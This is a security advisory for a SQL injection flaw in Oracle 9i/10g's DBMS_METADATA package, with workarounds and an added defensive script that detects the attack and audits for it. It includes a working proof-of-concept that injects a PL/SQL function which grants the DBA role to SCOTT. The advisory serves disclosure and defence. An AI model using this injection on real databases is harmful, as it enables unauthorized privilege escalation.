SQL Injection via Oracle DBMS_METADATA in Oracle 9i / 10g

Name: SQL Injection via Oracle DBMS_METADATA in Oracle 9i / 10g
Systems Affected: Oracle 9i / 10g
Severity: High Risk
Category: SQL Injection
Vendor URL: http://www.oracle.com/
Credit: Esteban Martinez Fayo (<argeniss>dot<com)
Exploit: http://www.argeniss.com
Date: 18 Apr 2005 (V 1.00)

Details

The following proof-of-concept exploit code injects a custom PL/SQL function into a call to SYS.DBMS_METADATA.GET_DDL. Because the package runs with the privileges of its owner, the injected function is executed in the SYS context and grants the DBA role to the user SCOTT.



Workarounds
REVOKE EXECUTE ON SYS.DBMS_METADATA FROM PUBLIC FORCE;


Example
-- Create the function first, then inject a call to it. The function body runs as user SYS.
CREATE OR REPLACE FUNCTION "SCOTT"."ATTACK_FUNC" return varchar2
authid current_user as
pragma autonomous_transaction;
BEGIN
EXECUTE IMMEDIATE 'GRANT DBA TO SCOTT';
COMMIT;
RETURN '';
END;
/

-- Inject the function in the vulnerable procedure
SELECT SYS.DBMS_METADATA.GET_DDL('''||SCOTT.ATTACK_FUNC()||''','') FROM dual;


Patch Information
Revoke the grants as shown above or apply the patches listed in the Oracle Critical Patch Update of April 2005.
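The following verification script is added here and is not part of the original advisory. It checks, from a DBA session, that the workaround is in place, looks for the outcome and the artifacts of the attack described above, and enables auditing so later attempts are recorded. The schema name exclusions are an assumption; extend them for your own application schemas.

```sql
-- 1. Verify the workaround: no row should be returned once EXECUTE has been
--    revoked from PUBLIC on SYS.DBMS_METADATA.
SELECT grantee, owner, table_name, privilege
  FROM dba_tab_privs
 WHERE owner = 'SYS'
   AND table_name = 'DBMS_METADATA'
   AND grantee = 'PUBLIC';

-- 2. Detect the outcome of a successful attack: every holder of the DBA role.
--    Anything other than SYS, SYSTEM and your known administrators needs explaining.
SELECT grantee, admin_option
  FROM dba_role_privs
 WHERE granted_role = 'DBA'
 ORDER BY grantee;

-- 3. Detect the artifact: PL/SQL in non-system schemas that issues a GRANT
--    through dynamic SQL, the pattern used by the injected function above.
--    (Schema exclusion list is an assumption; adjust it for your environment.)
SELECT owner, name, type, line, text
  FROM dba_source
 WHERE owner NOT IN ('SYS', 'SYSTEM')
   AND type IN ('FUNCTION', 'PROCEDURE', 'PACKAGE BODY')
   AND UPPER(text) LIKE '%EXECUTE IMMEDIATE%GRANT %'
 ORDER BY owner, name, line;

-- 4. Record future attempts: audit every execution of the package and every
--    GRANT/REVOKE of system privileges and roles (requires AUDIT_TRAIL to be enabled).
AUDIT EXECUTE ON SYS.DBMS_METADATA BY ACCESS;
AUDIT SYSTEM GRANT;

-- 5. Review what the audit trail has captured so far.
SELECT username, os_username, action_name, obj_name, timestamp
  FROM dba_audit_trail
 WHERE obj_name = 'DBMS_METADATA'
    OR action_name IN ('GRANT ROLE', 'GRANT OBJECT', 'REVOKE ROLE')
 ORDER BY timestamp DESC;
```

Run step 1 before and after applying the REVOKE from the Workarounds section; a row that survives the revoke means the package is still reachable by every database user.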



2005 by Red-Database-Security GmbH - last update 02-nov-2005

Definition: Exploit
In computer security, an exploit is a piece of software that takes advantage of a bug or vulnerability, leading to privilege escalation or denial of service (DoS) on a computer system.
Computer security experts use exploit code to test whether a patch is working properly.